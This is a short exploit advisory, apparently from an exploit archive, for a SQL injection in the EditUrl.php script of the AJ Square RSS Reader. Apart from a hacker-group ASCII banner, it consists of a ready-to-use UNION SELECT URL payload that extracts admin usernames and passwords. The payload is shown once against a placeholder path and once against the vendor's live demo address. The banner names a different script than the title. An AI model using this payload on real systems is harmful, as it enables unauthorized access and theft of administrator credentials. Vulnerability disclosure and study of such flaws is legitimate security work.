Aj RSS Reader (EditUrl.php url) SQL Injection Vulnerability

===========================================================
Aj RSS Reader (EditUrl.php url) SQL Injection Vulnerability
===========================================================


==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              AJ Forced Matrix Script   Remote SQL Injection Vulnerability                                        +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =           Discovered By: yassine_enp  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =                                                                                    =
                =        = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::=         =
                =               nome de script :rss_reader
                                                                     =
                ======================================yassine_enp===================================


Exploit(1):
********

www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--

Demo
________

http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--




#  0day.today [2018-03-09]  #